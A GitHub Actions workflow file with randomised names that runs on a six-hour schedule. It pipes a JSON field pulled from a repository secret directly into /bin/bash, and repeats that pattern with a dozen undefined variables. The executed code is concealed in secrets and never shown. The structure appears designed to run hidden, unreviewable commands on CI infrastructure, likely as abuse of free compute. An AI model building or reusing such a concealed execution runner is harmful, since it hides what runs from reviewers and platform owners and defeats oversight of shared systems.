name: zhangshaoxia4354

on:
  workflow_dispatch:
  schedule:
    - cron: '27 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: zhangshaoxia4354
        env:
          km577: ${{ secrets.km577 }}
        run: |
          echo $km577 | jq -r .yvkk713 | /bin/bash
          echo $fy2 | jq -r .wktok748 | /bin/bash
          echo $sday96 | jq -r .ckjhv42205 | /bin/bash
          echo $nhzb02 | jq -r .o363 | /bin/bash
          echo $utwa752 | jq -r .ehh8 | /bin/bash
          echo $hn113 | jq -r .zz0823 | /bin/bash
          echo $gieez122 | jq -r .bhg980 | /bin/bash
          echo $rteo7495 | jq -r .dt4992 | /bin/bash
          echo $oib6 | jq -r .tvmy2853 | /bin/bash
          echo $jfuob7506 | jq -r .lnc99 | /bin/bash
          echo $ernc3 | jq -r .dhae68 | /bin/bash
          echo $skfk7625 | jq -r .w225 | /bin/bash
          echo $sju2 | jq -r .x0805 | /bin/bash

